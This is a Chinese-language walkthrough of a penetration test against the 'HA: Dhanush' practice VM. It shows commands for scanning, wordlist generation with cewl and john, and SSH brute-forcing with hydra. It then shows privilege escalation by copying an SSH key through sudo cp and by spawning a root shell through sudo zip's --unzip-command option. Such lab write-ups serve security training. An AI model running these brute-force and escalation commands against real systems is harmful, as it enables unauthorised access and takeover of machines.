HA: Dhanush靶机渗透测试
生活随笔
收集整理的這篇文章主要介紹了
HA: Dhanush靶机渗透测试
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
文章目錄
- 一、信息收集
- 1.主機發現
- 2.端口掃描
- 3.查看 web 服務
- 二、漏洞挖掘
- 1.使用 cewl 生成字典
- 2.使用 hydra 進行爆破
- 3.ssh 連接
- 4.嘗試 sudo 提權
靶機介紹:
一、信息收集
1.主機發現
arp-scan -l
發現靶機 ip:192.168.1.119
2.端口掃描
nmap -A -p- 192.168.1.119
發現開放了 80 端口,Apache 服務,ubuntu系統;
65345 端口,ssh 服務
3.查看 web 服務
訪問 192.168.1.119:
發現介紹 dhanush,沒有什么特別的
二、漏洞挖掘
1.使用 cewl 生成字典
沒有什么信息,根據提示:枚舉,我們嘗試從靶機的 web 服務生成 ssh 登陸的賬號密碼進行遍歷爆破
cewl http://192.168.1.119/ -w dict.txt #生成密碼
john --wordlist=dict.txt --stdout --rules > ./users.txt #生成用戶名列表
2.使用 hydra 進行爆破
hydra -L ./users.txt -P ./dict.txt 192.168.1.119 ssh -s 65345 -e nsr -t 30
爆破時間較長,大概需要 10 分鐘左右
3.ssh 連接
ssh pinak@192.168.1.119 -p 65345
yes
Gandiv
4.嘗試 sudo 提權
發現可以以 sarang 用戶權限使用 cp,查看該用戶信息
發現 sarang 路徑下有 .ssh 目錄,嘗試進入但是沒有權限,結合 sudo -l 得到的可以 sarang 權限執行 cp ,嘗試在當前用戶創建 ssh,將公鑰復制到 sarang 路徑去然后使用 ssh 連接
cd ~
ssh-keygen #生成ssh密鑰(我這里是一直回車無密碼)
chmod 777 ./.ssh/id_rsa.pub
cp .ssh/id_rsa.pub /home/pinak
sudo -u sarang /bin/cp ./id_rsa.pub /home/sarang/.ssh/authorized_keys
ssh sarang@127.0.0.1 -i /.ssh/id_rsa -p 65345
經過一番操作可以看到我們進入了 sarang 用戶
再次嘗試 sudo 提權
發現可以以 root 權限執行 zip 命令,進行利用獲得 root 權限
touch dhanush
sudo zip /tmp/dhanush.zip /home/sarang/dhanush -T --unzip-command="sh -c /bin/bash"
cd /root
總結
以上是生活随笔為你收集整理的HA: Dhanush靶机渗透测试的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Lampiao靶机渗透测试
- 下一篇: HA: Forensics靶机渗透测试